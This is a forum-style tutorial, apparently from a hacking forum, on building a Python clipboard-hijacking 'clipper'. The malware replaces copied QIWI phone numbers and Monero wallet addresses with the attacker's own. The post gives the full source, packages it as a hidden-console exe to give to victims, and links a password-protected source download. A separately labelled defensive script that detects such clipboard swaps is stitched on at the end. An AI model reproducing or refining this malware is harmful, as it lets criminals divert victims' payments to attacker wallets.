Lord777
Today we will try ourselves as a malware developer by creating a simple clipper for qiwi, poison, monero.
Foreword
Clipper is a virus that monitors the clipboard of an infected PC for the details of electronic wallets and, if such are displayed, replaces the data in the buffer with those specified by the creator.
For example:
Let's say you have a clipper dropped on your pc. For example, you need to pay for a service or conduct a transaction. You copy the wallet number (it doesn't matter what it is: crypt, poison, webmoney, qiwi), after you copy the wallet number, the clipper will replace the copied wallet to the creator's wallet. The money flew away in an unknown direction and it is almost impossible to prove anything to anyone. PROFIT!
Let's move on to practice
Installing Python
Follow the link. Download the latest version and install it.
Coding
Let's import the modules we need:
Code:
from win32clipboard import *
from time import sleep
import os
Declaring variables
Code:
my_qiwi = *** QIWI ***
my_monero_poloniex = ***MONERO_POLONIEX***
The main part of the code
Code:
while True: # Canned loop
OpenClipboard () # Open the clipboard
data = GetClipboardData () # Read data from the clipboard
CloseClipboard () # Close the clipboard (the rules are xD)
if len (data) == 12: # If the length is 12 characters, it may be a phone number RU
if (data.startswith ("+ 79") or data.startswith ("79") or data.startswith ("89")): # If the text starts with "+79", "79", "89", then we change it
OpenClipboard () # Open the clipboard
EmptyClipboard () # Clear the clipboard
SetClipboardText (my_qiwi) # Change the text
CloseClipboard () # Close the clipboard
sleep (0.1) # Break, because if we constantly open the clipboard, an error will be thrown: "Access denied"
if data.startswith ("4JUdGzvrMFDWrUUwY3toJATSeNwjn54Lk"): # If the text starts with "4JUdGzvrMFDWrUUwY3toJATSeNwjn54Lk", then this is exactly the Monero Poloniex wallet number
OpenClipboard () # Open the clipboard
EmptyClipboard () # Clear the clipboard
SetClipboardText (my_monero_poloniex) # Change the text
CloseClipboard () # Close the clipboard
sleep (0.1) # Break, because if we constantly open the clipboard, an error will be thrown: "Access denied"
Compile to exe to feed our code to the victim
Let's use the PyInstaller program. It can be installed thanks to the command we need to enter in the CMD: pip install pyinstaller. Here are the Pyinstaller arguments we'll be using:
1) -F, will collect all files into one exe file.
2) -w, will disable the console.
3) -i *** path to the icon ***, an argument that will connect the icon to the program.
Final command for CMD: pyinstaller -F -w -i *** path to icon *** *** path to .py file ***.
Source codes
Download link: https://filecloud.me/ydcox8pbql7p.html
Password: h0peIess
You can also find on the Internet the source codes of the scripts that will add this virus to StartUp, will be hidden from the Task Manager.
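Seen from the defending side, the swap this post describes has a clear signature: a payment-shaped clipboard value is overwritten a fraction of a second later by a different value of the same shape, written by another process. The detection sketch below is an added example, not part of the original post; the `ClipEvent` record, the process names and the 2-second window are assumptions, and the sample events are constructed.

```python
import re
from dataclasses import dataclass

# Value shapes the post's clipper looks for: RU phone numbers (QIWI) and Monero addresses.
SHAPES = {
    "ru_phone": re.compile(r"(?:\+79|79|89)\d{9}"),
    "monero": re.compile(r"4[1-9A-HJ-NP-Za-km-z]{94}"),  # 95-char standard address
}

@dataclass
class ClipEvent:      # hypothetical telemetry record, not a real EDR schema
    ts: float         # time of the clipboard write, in seconds
    process: str      # image name of the process that wrote the clipboard
    text: str         # text placed on the clipboard

def shape_of(text):
    """Return the name of the payment shape the text matches, or None."""
    for name, rx in SHAPES.items():
        if rx.fullmatch(text.strip()):
            return name
    return None

def find_swaps(events, window=2.0):
    """Flag a payment-shaped value replaced by a different value of the same
    shape, written by a different process, within `window` seconds."""
    alerts, prev = [], None
    for ev in sorted(events, key=lambda e: e.ts):
        shape = shape_of(ev.text)
        if (prev and shape and shape == shape_of(prev.text)
                and ev.text.strip() != prev.text.strip()
                and ev.process != prev.process
                and ev.ts - prev.ts <= window):
            alerts.append((shape, prev.process, ev.process, round(ev.ts - prev.ts, 3)))
        prev = ev
    return alerts

# Constructed sample events; the numbers and addresses are filler, not real wallets.
SAMPLE = [
    ClipEvent(10.00, "chrome.exe", "+79001234567"),
    ClipEvent(10.12, "updater.exe", "+79007654321"),  # replaced about 0.1 s later
    ClipEvent(30.00, "chrome.exe", "4" + "A" * 94),
    ClipEvent(30.15, "updater.exe", "4" + "B" * 94),  # replaced
    ClipEvent(50.00, "notepad.exe", "hello"),
    ClipEvent(50.10, "chrome.exe", "+79001234567"),   # ordinary copy, no alert
]

if __name__ == "__main__":
    for alert in find_swaps(SAMPLE):
        print(alert)
```

The same-shape, different-process, short-interval combination keeps ordinary copy and paste quiet; a user who copies two phone numbers in a row from one application does not trigger it.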